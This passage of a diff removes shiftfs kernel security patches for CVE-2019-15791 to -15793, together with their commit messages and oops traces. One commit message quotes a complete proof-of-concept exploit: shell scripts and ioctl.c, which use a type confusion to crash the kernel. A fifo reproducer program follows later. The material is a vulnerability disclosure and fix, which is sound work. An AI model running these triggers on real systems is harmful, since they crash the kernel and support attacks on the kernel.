-[ 183.516155] __x64_sys_mmap+0x33/0x40
-[ 183.517352] do_syscall_64+0x5a/0x130
-[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
-[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
-[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
-[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
-[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
-[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
-[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
-[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
-[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
-[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
-[ 183.560350] ---[ end trace 4a860910803657c2 ]---
-[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
-[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
-[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
-[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
-[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
-[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
-[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
-[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
-[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
-[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
-[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
-[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
-[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
-=======================================
-
-Disassembly of surrounding code:
-
-55 push rbp
-4889E5 mov rbp,rsp
-4157 push r15
-4156 push r14
-4155 push r13
-4154 push r12
-488B87C8000000 mov rax,[rdi+0xc8]
-4C8B6810 mov r13,[rax+0x10]
-498B4528 mov rax,[r13+0x28]
-4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
-0F8497000000 jz near 0xcc
-4989FC mov r12,rdi
-4989F6 mov r14,rsi
-
-This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
-think this corresponds to the load of "realfile->f_op->mmap" in the source code.
-
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-
-CVE-2019-15791
-
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 35 +++++++++++++++++++++--------------
- 1 file changed, 21 insertions(+), 14 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 0d6ce377b07c..9a6a7ad50b90 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1389,8 +1389,7 @@ static inline bool is_btrfs_snap_ioctl(int cmd)
- 	return false;
- }
- 
--static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
--					  void __user *arg,
-+static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
- 					  struct btrfs_ioctl_vol_args *v1,
- 					  struct btrfs_ioctl_vol_args_v2 *v2)
- {
-@@ -1404,7 +1403,6 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
- 	else
- 		ret = copy_to_user(arg, v2, sizeof(*v2));
- 
--	fdput(lfd);
- 	__close_fd(current->files, fd);
- 	kfree(v1);
- 	kfree(v2);
-@@ -1415,11 +1413,11 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
- static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 					  struct btrfs_ioctl_vol_args **b1,
- 					  struct btrfs_ioctl_vol_args_v2 **b2,
--					  struct fd *lfd,
- 					  int *newfd)
- {
- 	int oldfd, ret;
- 	struct fd src;
-+	struct fd lfd = {};
- 	struct btrfs_ioctl_vol_args *v1 = NULL;
- 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
- 
-@@ -1444,18 +1442,28 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	if (!src.file)
- 		return -EINVAL;
- 
--	ret = shiftfs_real_fdget(src.file, lfd);
--	fdput(src);
--	if (ret)
-+	ret = shiftfs_real_fdget(src.file, &lfd);
-+	if (ret) {
-+		fdput(src);
- 		return ret;
-+	}
-+
-+	/*
-+	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
-+	 * take a reference here to offset the one which will be put by
-+	 * __close_fd(), and make sure that reference is put on fdput(lfd).
-+	 */
-+	get_file(lfd.file);
-+	lfd.flags |= FDPUT_FPUT;
-+	fdput(src);
- 
--	*newfd = get_unused_fd_flags(lfd->file->f_flags);
-+	*newfd = get_unused_fd_flags(lfd.file->f_flags);
- 	if (*newfd < 0) {
--		fdput(*lfd);
-+		fdput(lfd);
- 		return *newfd;
- 	}
- 
--	fd_install(*newfd, lfd->file);
-+	fd_install(*newfd, lfd.file);
- 
- 	if (cmd == BTRFS_IOC_SNAP_CREATE) {
- 		v1->fd = *newfd;
-@@ -1468,7 +1476,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	}
- 
- 	if (ret)
--		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
-+		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
- 
- 	return ret;
- }
-@@ -1482,13 +1490,12 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	int newfd = -EBADF;
- 	long err = 0, ret = 0;
- 	void __user *argp = (void __user *)arg;
--	struct fd btrfs_lfd = {};
- 	struct super_block *sb = file->f_path.dentry->d_sb;
- 	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
- 	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
- 
- 	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
--					     &btrfs_lfd, &newfd);
-+					     &newfd);
- 	if (ret < 0)
- 		return ret;
- 
-@@ -1511,7 +1518,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	fdput(lowerfd);
- 
- out_restore:
--	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
-+	err = shiftfs_btrfs_ioctl_fd_restore(cmd, newfd, argp,
- 					     btrfs_v1, btrfs_v2);
- 	if (!ret)
- 		ret = err;
--- 
-2.39.2
-
-From 187086d532fb6b5cb7785ebcb5438e170f136491 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 1 Nov 2019 14:19:16 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent type confusion
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850867
-
-Verify filesystem type in shiftfs_real_fdget().
-
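-A minimal sketch of the idea, based on the shape of shiftfs_real_fdget()
-as quoted in the report below (not necessarily the exact check the patch
-adds): refuse to interpret file->private_data until the file is known to
-have been opened by shiftfs itself, e.g. by comparing f_op:
-
- static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
- {
- 	struct shiftfs_file_info *file_info;
-
- 	/* Sketch: only trust private_data for shiftfs files. */
- 	if (file->f_op != &shiftfs_file_operations)
- 		return -EINVAL;
-
- 	file_info = file->private_data;
- 	lowerfd->flags = 0;
- 	lowerfd->file = file_info->realfile;
-
- 	/* Did the flags change since open? */
- 	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
- 		return shiftfs_change_flags(lowerfd->file, file->f_flags);
-
- 	return 0;
- }
-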
-Quoting Jann Horn:
- #################### Bug 2: Type confusion ####################
-
- shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks
- passes the resulting file* into shiftfs_real_fdget(), which does this:
-
- static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
- {
-  struct shiftfs_file_info *file_info = file->private_data;
-  struct file *realfile = file_info->realfile;
-
-  lowerfd->flags = 0;
-  lowerfd->file = realfile;
-
-  /* Did the flags change since open? */
-  if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-   return shiftfs_change_flags(lowerfd->file, file->f_flags);
-
-  return 0;
- }
-
- file->private_data is a void* that points to a filesystem-dependent type; and
- some filesystems even use it to store a type-cast number instead of a pointer.
- The implicit cast to a "struct shiftfs_file_info *" can therefore be a bad cast.
-
- As a PoC, here I'm causing a type confusion between struct shiftfs_file_info
- (with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at
- offset 0x10), and I use that to cause a memory dereference somewhere around
- 0x4242:
-
- =======================================
- user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh
- #!/bin/sh
- sync
- unshare -mUr ./run2.sh
- user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh
- #!/bin/sh
- set -e
-
- mkdir -p mnt/tmpfs
- mkdir -p mnt/shiftfs
- mount -t tmpfs none mnt/tmpfs
- mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
- mount|grep shift
- gcc -o ioctl ioctl.c -Wall
- ./ioctl
- user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c
- #include <sys/ioctl.h>
- #include <fcntl.h>
- #include <err.h>
- #include <unistd.h>
- #include <linux/btrfs.h>
- #include <sys/mman.h>
-
- int main(void) {
-   // make our vmacache sequence number something like 0x4242
-   for (int i=0; i<0x4242; i++) {
-     void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
-         MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
-     if (x == MAP_FAILED) err(1, "mmap vmacache seqnum");
-     munmap(x, 0x1000);
-   }
-
-   int root = open("mnt/shiftfs", O_RDONLY);
-   if (root == -1) err(1, "open shiftfs root");
-   int foofd = open("/proc/self/environ", O_RDONLY);
-   if (foofd == -1) err(1, "open foofd");
-   // trigger the confusion
-   struct btrfs_ioctl_vol_args iocarg = {
-     .fd = foofd
-   };
-   ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
- }
- user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh
- none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
- /home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
- [ 348.103005] BUG: unable to handle page fault for address: 0000000000004289
- [ 348.105060] #PF: supervisor read access in kernel mode
- [ 348.106573] #PF: error_code(0x0000) - not-present page
- [ 348.108102] PGD 0 P4D 0
- [ 348.108871] Oops: 0000 [#1] SMP PTI
- [ 348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
- [ 348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
- [ 348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
- [ 348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
- [ 348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
- [ 348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
- [ 348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
- [ 348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
- [ 348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
- [ 348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
- [ 348.133421] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
- [ 348.135753] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
- [ 348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
- [ 348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
- [ 348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
- [ 348.143545] Call Trace:
- [ 348.144272] shiftfs_ioctl+0x65/0x76 [shiftfs]
- [ 348.145562] do_vfs_ioctl+0x407/0x670
- [ 348.146620] ? putname+0x4a/0x50
- [ 348.147556] ksys_ioctl+0x67/0x90
- [ 348.148514] __x64_sys_ioctl+0x1a/0x20
- [ 348.149593] do_syscall_64+0x5a/0x130
- [ 348.150658] entry_SYSCALL_64_after_hwframe+0x44/0xa9
- [ 348.152108] RIP: 0033:0x7f77fa76767b
- [ 348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48
- [ 348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010
- [ 348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b
- [ 348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003
- [ 348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000
- [ 348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100
- [ 348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000
- [ 348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci net_failover failover virtio_blk
- [ 348.188617] CR2: 0000000000004289
- [ 348.189586] ---[ end trace dad859a1db86d660 ]---
- [ 348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
- [ 348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
- [ 348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
- [ 348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
- [ 348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
- [ 348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
- [ 348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
- [ 348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
- [ 348.210395] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
- [ 348.212710] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
- [ 348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
- [ 348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
- [ 348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
- Killed
- user@ubuntu1910vm:~/shiftfs_confuse$
-
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-[ saf: use f_op->open instead as special inodes in shiftfs sbs
-  will not use shiftfs open f_ops ]
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-
-CVE-2019-15792
-
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 33 +++++++++++++++++++--------------
- 1 file changed, 19 insertions(+), 14 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 9a6a7ad50b90..897e0163005e 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1087,20 +1087,6 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
- 	return 0;
- }
- 
--static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
--{
--	struct file *realfile = file->private_data;
--
--	lowerfd->flags = 0;
--	lowerfd->file = realfile;
--
--	/* Did the flags change since open? */
--	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
--		return shiftfs_change_flags(lowerfd->file, file->f_flags);
--
--	return 0;
--}
--
- static int shiftfs_open(struct inode *inode, struct file *file)
- {
- 	struct file *realfile;
-@@ -1187,6 +1173,25 @@ static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
- 	return flags;
- }
- 
-+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
-+{
-+	struct file *realfile;
-+
-+	if (file->f_op->open != shiftfs_open &&
-+	    file->f_op->open != shiftfs_dir_open)
-+		return -EINVAL;
-+
-+	realfile = file->private_data;
-+	lowerfd->flags = 0;
-+	lowerfd->file = realfile;
-+
-+	/* Did the flags change since open? */
-+	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-+		return shiftfs_change_flags(lowerfd->file, file->f_flags);
-+
-+	return 0;
-+}
-+
- static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
- {
- 	struct file *file = iocb->ki_filp;
--- 
-2.39.2
-
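The fix above is an instance of a broader defensive rule: never trust
file->private_data on a struct file received from userspace until the
file is proven to belong to your filesystem, for example by comparing a
function pointer in its f_op. A toy userspace model of that check (all
names are invented for illustration; none of this is kernel API):

 #include <errno.h>
 #include <stdio.h>

 /* Toy stand-ins for the kernel structures involved. */
 struct file_ops { int (*open)(void); };
 struct file { const struct file_ops *f_op; void *private_data; };

 static int myfs_open(void) { return 0; }
 static const struct file_ops myfs_fops = { .open = myfs_open };

 /* The fixed idiom: verify identity before casting private_data. */
 static int myfs_real_file(const struct file *f, void **real)
 {
 	if (f->f_op->open != myfs_open)
 		return -EINVAL; /* foreign file: private_data is opaque */
 	*real = f->private_data;
 	return 0;
 }

 int main(void)
 {
 	char payload = 'x';
 	struct file ours = { &myfs_fops, &payload };
 	void *real;
 	printf("ours -> %d\n", myfs_real_file(&ours, &real)); /* 0 */
 	return 0;
 }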
-From 7bb96158915054edeee67b13212cd19b8fff54bd Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 1 Nov 2019 13:35:25 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Correct id translation for lower fs
- operations
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850867
-
-Several locations that shift ids are translating user/group ids into
-init_user_ns before performing operations in the lower filesystem,
-whereas they should be translated into the s_user_ns of the lower
-filesystem. This will result in using ids other than the intended
-ones in the lower fs, which will likely not map into the shiftfs
-s_user_ns.
-
-Change these sites to use shift_k[ug]id() to do a translation
-into the s_user_ns of the lower filesystem.
-
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-
-CVE-2019-15793
-
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 43 +++++++++++++++++++++++--------------------
- 1 file changed, 23 insertions(+), 20 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 897e0163005e..04fba4689eb6 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -83,12 +83,27 @@ static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
- 	put_cred(newcred);
- }
- 
-+static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
-+			 kuid_t kuid)
-+{
-+	uid_t uid = from_kuid(from, kuid);
-+	return make_kuid(to, uid);
-+}
-+
-+static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
-+			 kgid_t kgid)
-+{
-+	gid_t gid = from_kgid(from, kgid);
-+	return make_kgid(to, gid);
-+}
-+
- static int shiftfs_override_object_creds(const struct super_block *sb,
- 					 const struct cred **oldcred,
- 					 struct cred **newcred,
- 					 struct dentry *dentry, umode_t mode,
- 					 bool hardlink)
- {
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	kuid_t fsuid = current_fsuid();
- 	kgid_t fsgid = current_fsgid();
- 
-@@ -100,8 +115,8 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
- 		return -ENOMEM;
- 	}
- 
--	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
--	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
-+	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
- 
- 	if (!hardlink) {
- 		int err = security_dentry_create_files_as(dentry, mode,
-@@ -117,20 +132,6 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
- 	return 0;
- }
- 
--static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
--			 kuid_t kuid)
--{
--	uid_t uid = from_kuid(from, kuid);
--	return make_kuid(to, uid);
--}
--
--static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
--			 kgid_t kgid)
--{
--	gid_t gid = from_kgid(from, kgid);
--	return make_kgid(to, gid);
--}
--
- static void shiftfs_copyattr(struct inode *from, struct inode *to)
- {
- 	struct user_namespace *from_ns = from->i_sb->s_user_ns;
-@@ -758,6 +759,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	struct iattr newattr;
- 	const struct cred *oldcred;
- 	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	int err;
- 
- 	err = setattr_prepare(dentry, attr);
-@@ -765,8 +767,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 		return err;
- 
- 	newattr = *attr;
--	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
--	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
-+	newattr.ia_uid = shift_kuid(sb->s_user_ns, sbinfo->userns, attr->ia_uid);
-+	newattr.ia_gid = shift_kgid(sb->s_user_ns, sbinfo->userns, attr->ia_gid);
- 
- 	/*
- 	 * mode change is for clearing setuid/setgid bits. Allow lower fs
-@@ -1356,6 +1358,7 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
- 					const struct cred **oldcred,
- 					struct cred **newcred)
- {
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	kuid_t fsuid = current_fsuid();
- 	kgid_t fsgid = current_fsgid();
- 
-@@ -1367,8 +1370,8 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
- 		return -ENOMEM;
- 	}
- 
--	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
--	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
-+	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
- 
- 	/* clear all caps to prevent bypassing capable() checks */
- 	cap_clear((*newcred)->cap_bset);
--- 
-2.39.2
-
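shift_kuid()/shift_kgid() encode a general rule: translating an id
between user namespaces is always "map out of the source namespace,
then map into the destination namespace". A toy userspace model with
made-up offset mappings, only to make the arithmetic concrete (real
kernel mappings are ranges configured via uid_map, and the real helpers
operate on kuid_t/kgid_t):

 #include <stdio.h>

 /* Toy mappings: ns A maps container uid u to host uid u + 100000,
  * ns B maps container uid u to host uid u + 200000. */
 static int from_kuid_A(int kuid) { return kuid - 100000; } /* host -> A */
 static int make_kuid_B(int uid)  { return uid + 200000; }  /* B -> host */

 int main(void)
 {
 	int kuid = 100000;            /* host id that is root inside A  */
 	int uid  = from_kuid_A(kuid); /* 0: the id as ns A sees it      */
 	int out  = make_kuid_B(uid);  /* 200000: the same role in ns B  */
 	printf("host %d -> ns uid %d -> host %d\n", kuid, uid, out);
 	return 0;
 }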
-From f140d37a80df29e1746b9ba9a29cf5b505c6a70f Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 17 Jan 2020 16:17:06 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent lower dentries from going
- negative during unlink
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1860041
-
-All non-special files (for shiftfs the special files are only fifos
-and, in this case, unix sockets, since we don't allow character and
-block devices to be created) go through shiftfs_open() and have their
-dentry pinned through this codepath, preventing it from going
-negative. But fifos don't use the shiftfs fops but rather the
-pipefifo_fops, which means they do not go through shiftfs_open() and
-thus don't have their dentry pinned that way. The lower dentries for
-such files can therefore go negative on unlink, causing segfaults.
-The following C program can be used to reproduce the crash:
-
- #include <stdio.h>
- #include <fcntl.h>
- #include <unistd.h>
- #include <sys/types.h>
- #include <sys/stat.h>
- #include <unistd.h>
- #include <stdlib.h>
-
- int main(int argc, char *argv[])
- {
-        struct stat stat;
-
-        unlink("./bbb");
-
-        int ret = mknod("./bbb", S_IFIFO|0666, 0);
-        if (ret < 0)
-                exit(1);
-
-        int fd = open("./bbb", O_RDWR);
-        if (fd < 0)
-                exit(2);
-
-        if (unlink("./bbb"))
-                exit(4);
-
-        fstat(fd, &stat);
-
-        return 0;
- }
-
-Similar to ecryptfs we need to dget() the lower dentry before calling
-vfs_unlink() on it and dput() it afterwards.
-
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Link: https://travis-ci.community/t/arm64-ppc64le-segfaults/6158/3
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 04fba4689eb6..3623d02b061e 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -583,6 +583,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- 	int err;
- 	const struct cred *oldcred;
- 
-+	dget(lowerd);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
- 	inode_lock_nested(loweri, I_MUTEX_PARENT);
- 	if (rmdir)
-@@ -602,6 +603,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
